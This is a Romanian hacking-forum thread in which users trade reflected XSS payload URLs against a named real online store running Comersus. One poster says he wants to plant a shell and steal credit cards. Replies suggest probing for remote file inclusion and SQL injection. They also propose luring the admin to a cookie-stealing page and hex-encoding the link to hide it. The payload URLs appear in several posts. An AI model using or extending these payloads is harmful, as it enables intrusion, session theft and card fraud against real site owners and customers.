Simpatie.ro - matrimoniale
Hacking and more...
HaCkinG CulT
Nou pe simpatie:
alexxandra pe Simpatie.ro
Femeie
24 ani
Timis
cauta Barbat
26 - 59 ani
Hacking and more...ReguliInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
Hacking and more... / Hacked /

Shop Online (Comersus) Spart prin XSS

Pagini: 1 Moderat de Shocker
#1
Zero_Cool
Pe lista neagra
Postari: 796


Code:

http://www.dimac.net/order/store/comersus_customerAuthenticateForm.asp?redirectUrl=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E.



L`am spart prin XSS.Practic nu l`am spart da am gasit vulnerabilitatea.asta e cea mai importanta chestie.Dupa cum vedeti nu am putut pune de ex: Hacked by Zero Cool, puteam sa bag doar numere.

Acum o intrebare, cum pot baga un shell or something ? vreau sa fur cc`uri

Si pentru lamerii care iau si modifica si zic ca au fost spart de ei : Un Mare :cenzurat:

Daca nu ma credeti ca l`am spart io va dau screenshot


 
   
#2
Crash Override
Helper
Din: HackPedia
Postari: 275
incerca sa cauti rfi in site. sau vezi ce script este downloadeazal pe pc si uitate prin el , vezi ce poti sa ii faci .

_______________________________________
Hacking.3xForum.Ro - Helper

 
   
#3
Zero_Cool
Pe lista neagra
Postari: 796
pai, e comersus

Cat despre RFI nu a terminat inca scanarea.

OMG ! acu are si vulnerabilitati in MySQL Injection si cookie manipulating        asa`s toate comersus`uriile 


 
   
#4
Crash Override
Helper
Din: HackPedia
Postari: 275
@Zero: Cat despre RFI nu a terminat inca scanarea.

Ma refeream manual ... tu dai cu scanner ?


_______________________________________
Hacking.3xForum.Ro - Helper

 
   
#5
Zero_Cool
Pe lista neagra
Postari: 796
aha
Manual nu prea pare sa aiba vulnerabilitati RFI :|


 
   
#6
IcE-T
Little Kevin
Postari: 97
Man zi si mie cum poti sa spargi un site prin vulnerabilitati ? am copiat progamu ala si am dat new scan am pus un site apoi am dat next... next. si finish si a inceput sa scaneze si ce tre sa caut eu acolo sau ce tre sa fac ca sa ii aflu pagina de logare sau sa il sparg ? pls exemplu cum a facut zero_cool cam asa  ? ma ajuta careva ?

 
   
#7
Crash Override
Helper
Din: HackPedia
Postari: 275
Crezi ca e la fel de simplu precum intratu pe mIRC ?

_______________________________________
Hacking.3xForum.Ro - Helper

 
   
#8
TheBes7
user
Din: Camera Mea !
Postari: 896
@Zero_CooL : l'ai scanat cu Acunetix ?

_______________________________________
PinkMedia-Comunity Star

 
   
#9
IcE-T
Little Kevin
Postari: 97
Nu da macar asa un ghid ce sa fac pls

 
   
#10
icelord
Elite Member
Postari: 612
@IcE-T tu esti cel cu forumul worldhack?Iti faci forum despre hack si esti pe dinafara!?

_______________________________________

MuOnline&Counter-Strike Support

 
   
#11
Zero_Cool
Pe lista neagra
Postari: 796
el e 

@No Comment:

Aha


 
   
#12
vgteam
Grand Master
Postari: 219
treaba comersus am prezentat-o eu pe hackpedia.org (cand era), tu doar ai cautat pe google... acuma incearca sa bagi redirect la un site pe care ai stealer.php si sa il trimiti prin mail la admin si ii furi cookieurile... bafta

pm me daca nu ai inteles


_______________________________________
HACKPEDIA project
stage: strangerea de fonduri :d

 
   
#13
Zero_Cool
Pe lista neagra
Postari: 796
da ce crezi ca adminu e prost sa pice in capcana ?  ar fi o idee da nu am cum sa fac linku mai mic nu stiu ....

 
   
#14
DonPuia
Junior
Postari: 23

Zero_Cool a scris:



Code:

http://www.dimac.net/order/store/comersus_customerAuthenticateForm.asp?redirectUrl=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E.



L`am spart prin XSS.Practic nu l`am spart da am gasit vulnerabilitatea.asta e cea mai importanta chestie.Dupa cum vedeti nu am putut pune de ex: Hacked by Zero Cool, puteam sa bag doar numere.


Code:

http://www.dimac.net/order/store/comersus_customerAuthenticateForm.asp?redirectUrl=%22%3E%3Cimg%20src=%22http://www.google.com/intl/en_ALL/images/logo.gif%22%20alt=%22

Poate te ajuta cu ceva 

Code:

http://www.dimac.net/order/store/comersus_customerAuthenticateForm.asp?redirectUrl=%22%3E%3Cscript%3Ealert('Hacked%20By%20Zero_cool')%3C/script%3E

Sau javascript cu text daca vrei asa Aveai o mica greseala de ortogtafie
Daca folosesti text in loc de numere nmu mai merge asa :

Code:

<ScRiPt>alert(666);</ScRiPt>

trebuie doua semne ' '

Code:

<ScRiPt>alert('sase sase sase');</ScRiPt>

Cheers


 
   
#15
Zero_Cool
Pe lista neagra
Postari: 796
tnx poti sa imi lasi si mie id tau pe pm ?

 
   
#16
DonPuia
Junior
Postari: 23
as putea dar nu vad dc ... ?
nu cred ca ti`as putea spune mai multe decat pot aici


 
   
#17
Zero_Cool
Pe lista neagra
Postari: 796
ok cum vrei vroiam doar sa vorbim

 
   
#18
vgteam
Grand Master
Postari: 219
ca adminu sa pice in plasa poti sa codezi urlu' in HEXE

_______________________________________
HACKPEDIA project
stage: strangerea de fonduri :d

 
   
Pagini: 1  
Mergi la